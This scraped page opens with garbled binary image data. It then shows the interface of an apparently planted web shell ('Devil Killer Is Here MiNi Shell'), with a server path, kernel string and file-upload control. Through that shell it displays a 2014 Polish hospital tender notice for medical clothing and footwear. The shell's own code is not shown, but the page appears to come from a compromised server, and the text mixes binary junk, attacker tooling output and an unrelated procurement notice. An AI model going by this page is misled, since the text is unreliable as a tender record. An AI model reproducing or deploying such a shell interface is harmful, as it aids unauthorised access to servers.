JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140620/208278-N-2014.html

<p class="kh_header"><b>Katowice: Dostawy odzieży ochronnej, roboczej i obuwia</b><br>
<b>Numer ogłoszenia: 208278 - 2014; data zamieszczenia: 20.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy odzieży ochronnej, roboczej i obuwia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są dostawy odzieży ochronnej, roboczej i obuwia. Zamawiający przedmiot zamówienia podzielił na 5 pakietów:
1.Odzież operacyjna wielorazowego użytku
2.Piżama dziecięca, młodzieżowa wielorazowego użytku
3.Odzież i obuwie dla Zespołu Wyjazdowego Ratownictwa Medycznego
4.Odzież i obuwie ochronne
5.Odzież dla personelu medycznego.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.83.00.00-6, 35.11.34.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: -sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie, że oferowany przedmiot zamówienia Pakiet nr 3 jest zgodny z wymaganiami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w sprawie oznaczenia systemu Państwowe Ratownictwo Medyczne oraz wymagań w zakresie umundurowania członków zespołów ratownictwa medycznego,
b)oświadczenie, że oferowany przedmiot zamówienia Pakiet nr 1 posiada wszystkie wymagane dokumenty przepisami ustawy z dnia 20 maja 2010 r. o wyrobach medycznych /Dz. U z 2010 r Nr 107 
poz. 679 dopuszczające oferowany przedmiot zamówienia do obrotu i używania w zakładach opieki zdrowotnej zgodnie z ustawą  i, że dokumenty będą udostępniane na każde wezwanie Zamawiającego,
c)katalogi lub dokumenty producenta potwierdzające wymagane parametry dla Pakietu 1,2,3,4,5  - dostarczone katalogi lub dokumenty producenta powinny być opisane, jakiego dotyczą Pakietu i pozycji   w pakiecie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w punkcie 1. 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień określonych w punkcie III.3.1. b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień publicznych, Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej trwania, w następujących przypadkach:
a. obniżenia ceny jednostkowej przez Wykonawcę, b. zmiany urzędowej stawki podatku VAT, przy czym zmianie ulegnie cena brutto, a cena netto pozostanie niezmieniona, i jako obowiązujące z mocy prawa nie będą wymagały zgody obu stron wyrażonej w formie pisemnej (aneks), c. zmiany numeru katalogowego przez producenta, d. zmiany terminu obowiązywania umowy w przypadku nie wykorzystania przez Zamawiającego w trakcie trwania umowy pełnej ilości dostarczanego przedmiotu umowy - przy zachowaniu dotychczasowej ceny, e. zmiany producenta przedmiotu umowy, w przypadku gdy producent wskazany w ofercie przez Wykonawcę wycofał dany towar z produkcji - przy cenie nie większej niż w umowie lub jeżeli Wykonawca nie może zaoferować w takim przypadku towar innego producenta w cenie nie wyższej niż w umowie, rozwiązanie jej w zakresie dotyczącym tego towaru za porozumieniem stron, bez konieczności ponoszenia kary przez żadną ze stron umowy, f. przedłużenia terminu płatności, g. zmiany stawek opłat celnych wprowadzonych decyzjami odpowiednich władz państwowych. h. w zakresie danych identyfikacyjnych strony umowy takich jak np. firma, adres osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej SIWZ można uzyskać w siedzibie Zamawiającego. Cena 10 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 10:00, miejsce: Siedziba Zamawiającego Kancelaria pok. nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odzież operacyjna wielorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bluza + spodnie 
Spodnie: gumka i troki do spodni
Bluza: Krótki rękaw,zakładana przez głowę,wykrój w kształcie litery V.
Kieszonka górna po lewej stronie, dwie kieszonki na dole. 	kpl	200
2.Bluza + spódnica
Spódnica: gumka i troki do spódnicy, długość na wysokości kolana 
Bluza: Krótki rękaw,zakładana przez głowę,wykrój w kształcie litery V.
Kieszonka górna po lewej stronie, dwie kieszonki na dole. 	kpl	40
3.Sukienka:Krótki rękaw,zakładana przez głowę,wykrój w kształcie litery V,wiązana na troki.
Kieszonka górna po lewej stronie, dwie kieszonki na dole. 	szt	20
	Wymagania Zamawiającego			
1.	Kolor : czerwony			
2.	Oznakowanie odzieży metodą haftu:			
	- treść  oznakowania  GCZD KATOWICE			
	Bluza,Sukienka na wysokości klatki piersiowej			
	- wszywka informacyjna dotycząca konserwacji oraz rozmiaru			
	- instrukcja użytkowania i konserwacji			
3.	Konstrukcja odzieży : 69% bawełna 30%poliester 1% nitka węglowa ( w wykonaniu odzieży tolerancja +/- 10%)			
4.	Właściwości: niska waga,brak pylenia,ochrona przeciw drobnoustrojom,wysoki poziom absorcji i uwalniania wilgotności,wysoki poziom przepuszczalności powietrza,długa żywotność i wytrzymałość, nitka węglowa zapewnia właściwości antystatyczne.
			
5.	Norma : Zgodnie z normą PN - EN 13795			
6.	Odporność na temperaturę prania w 95°C			
7.	Rozmiar: M - XXL			
8.	Zdjęcia katalogowe oferowanych modelów odzieży			
9.	Zróźnicowane rozmiary.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Piżama dziecięca, młodzieżowa wielorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Piżama bawełniana 
- Bluza długi rękaw zapinana z przodu na guziki
- Spodnie na gumce ,długie nogawki 
kpl	20
.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Odzież i obuwie dla Zespołu Wyjazdowego Ratownictwa Medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Kurtka p/deszczowa z oznakowaniem ostrzegawczym 60% poliester 40% bawełna   (? 10%) gramatura 245-260g/m2.
Kolor czerwony z elementami odblaskowymi i emblematami służb ratownictwa medycznego.
Tkanina wodoolejoodporna, charakteryzuje się zwiększoną wytrzymałością na uszkodzenia oraz łatwością usuwania plam.
Rozmiar 36-46
szt	15
2.Spodnie z oznakowaniem ostrzegawczym 60% poliester 40% bawełna   (? 10%) gramatura 245-260g/m2.
Kolor czerwony z elementami odblaskowymi i emblematami służb ratownictwa medycznego.
Tkanina wodoolejoodporna, charakteryzuje się zwiększoną wytrzymałością na uszkodzenia oraz łatwością usuwania plam.
Rozmiar 36-46
szt	15
3,Ocieplacz-bluza 100% poliester gramatura 143g/m2. (tolerancja +10 g/m2)
Kolor czerwony z elementami odblaskowymi i emblematami służb ratownictwa medycznego.
szt	15
4.Trzewiki robocze męskie (damskie) - SOR - zespoły wyjazdowe
- bardzo dobre właściwości antypoślizgowe - klasa SRC
- cholewka - skóra licowa o zmniejszonej nasiąkliwości wody, ochrona, kostki
- wykończenie wewnętrzne - podszewka odprowadzająca pot, wymienna wkładka przeciwpotna i przeciwgrzybiczna odpowiednia do wielkorotnego prania,profil ortopedyczny
- spełnienie ogólnych wymagań bezpieczeństwa dla obuwia zawodowego bez wzmocnionej ochrony palców stopy - oznakowanie CE ,
 deklaracja zgodności z normą  PN-EN ISO 20347 lub EN 347-1. 
Rozmiar 36-46
par	15
Wymagania Zamawiającego
Zgodność oferowanego asortymentu z wymaganiami Rozporządzenia Ministra Zdrowia z dnia 18 października 2010 r. w sprawie oznaczenia systemu Państwowe Ratownictwo Medyczne oraz wymagań w zakresie umundurowania członków zespołów ratownictwa medycznego
- Wszywka informacyjna dotycząca konserwacji oraz rozmiaru
- Instrukcja użytkowania i konserwacji
- Zdjęcia katalogowe oferowanych modeli odzieży
.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6, 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odzież i obuwie  ochronne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Sandały profilaktyczne męskie dla personelu medycznego:
- podeszwa antypoślizgowa
- wykończenie wewnętrzne antybakteryjne, wymienna wkładka przeciwpotna i przeciwgrzybiczna odpowiednia do wielokrotnego prania, profil ortopedyczny
- cholewka - skóra licowa biała, zamknięta część palcowa, perforacje i otwory umożliwiające wentylację stopy.
- spełnienie ogólnych wymagań bezpieczeństwa dla obuwia zawodowego bez wzmocnionej ochrony palców stopy - oznakowanie CE, deklaracja zgodności z normą PN-EN ISO 20347 lub EN 347-1.
w rozmiarze od nr 39 do 46. par	55
2.Sandały profilaktyczne damskie dla personelu medycznego:
- podeszwa antypoślizgowa
- wykończenie wewnętrzne antybakteryjne, wymienna wkładka przeciwpotna i przeciwgrzybiczna odpowiednia do wielokrotnego prania, profil ortopedyczny
- cholewka - skóra licowa biała, zamknięta część palcowa, perforacje i otwory umożliwiające wentylację stopy.
- spełnienie ogólnych wymagań bezpieczeństwa dla obuwia zawodowego bez wzmocnionej ochrony palców stopy - oznakowanie CE, deklaracja zgodności z normą PN-EN ISO 20347 lub EN 347-1. w rozmiarze od nr  35 do 42. par	338
3.Trzewiki robocze męskie z podnoskiem - pracownik gospodarczy
 - podeszwa antypoślizgowa
 - cholewka - skóra licowana,ochrona kostki
 - wykończenie wewnętrzne
 - podszewka odprowadzająca  pot,wymienna wkładka przeciwpotna i przeciwgrzybiczna, odpowiednia do wielokrotnego prania,profil ortopedyczny
 - spełnienie ogólnych wymagań bezpieczeństwa dla obuwia bezpiecznego z wzmocnioną ochroną palców stopy (podnosek),elektoizolacyjne
 - oznakowanie CE, deklaracja zgodności z normą PN -EN ISO 20345
Zróżnicowane rozmiary	par 12
4.Obuwie ocieplane                                                                    
 - obuwie skórzane
 - cholewka zapinana
 - wysoka stabilnosć
  - podeszwa antypoślizgowa
- metalowy podnosek,wyściółka z materiału ocieplającego
 - oznakowanie CE
deklaracja zgodności z normąPN - EN ISO 20345	par	3
5.Kalosze                                                                    
 - wierzch i spód wykonany z naturalnej gumy, podszewka z matewriału tekstylnego                                             
 - podeszwa antypoślizgowa,wysoka elastyczność, dobre właściwości higieniczne                                                              
   - cholewka poniżej kolana
 - bez podnoska                                                                              
 - spełnienie ogólnych wymagań bezpieczeństwa dla obuwia zawodowego bez wzmocnionej ochrony palców stopy
 - oznakowanie CE ,deklaracja zgodności z normą PN - EN ISO 20347	par	14
6.Sandały robocze 
Wierzch wykonany ze skóry o wytrzymałości mechanicznej, odpornej na otarcia, otwory umożliwiające wentylację stopy, zakryte palce.
Wnętrze wykończone materiałem przepuszczającym powietrze i płynnie dopsowującym się do kształtu stopy. Spód wykonany z tworzywa o własnościach antypoślizgowych i antyelektrostatycznych 
Wkładka wymienna zapewniająca przepływ powietrza i odprowadzenie wilgoci.
Obuwie przeznaczone do intensywnego użytkowania dla informatyków. Spełnienie ogólnych wymagań bezpieczeństwa dla obuwia zawodowego bez wzmocnionej ochrony palców stopy - oznakowanie CE, deklaracja zgodności z normą PN-EN ISO 20347 lub EN 347-1.	par	3
7.Podkoszulki bawełniane męskie - 100 procent bawełny,rękawy krótkie,kolor biały,gramatura 150-180g/m2 rozmiary M-XL	szt	10
8.Koszula męska flanelowa z kołnierzykiem,długi rękaw,zapinana na guziki,wykonana z 100 procent bawełny,gramatura flaneli 170-180g na m2	szt	9
9.Kurtka ocieplana męska z wykończeniem przeciwdeszczowym,podszewka oddychająca, z wentylacją w części pachowej, z kieszeniami,z kapturem,długość zakrywająca biodra.
Norma PN - EN 340,PN - EN 342	szt	3
10.Spodnie ocieplane do pasa,możliwość regulacji w pasie (gumka w bocznych partiach), z kieszeniami,wykończenie woodoodporne.
Norma PN - EN 340, PN - EN 342	szt	3
11.Bluza polarowa (ocieplacz), 100% poliester,gramatura 230-280g na m2, zapinana na suwak,półgolf,z kieszeniami,ściagacz w rekawach, fason dla mężczyzn i kobiet	szt	36
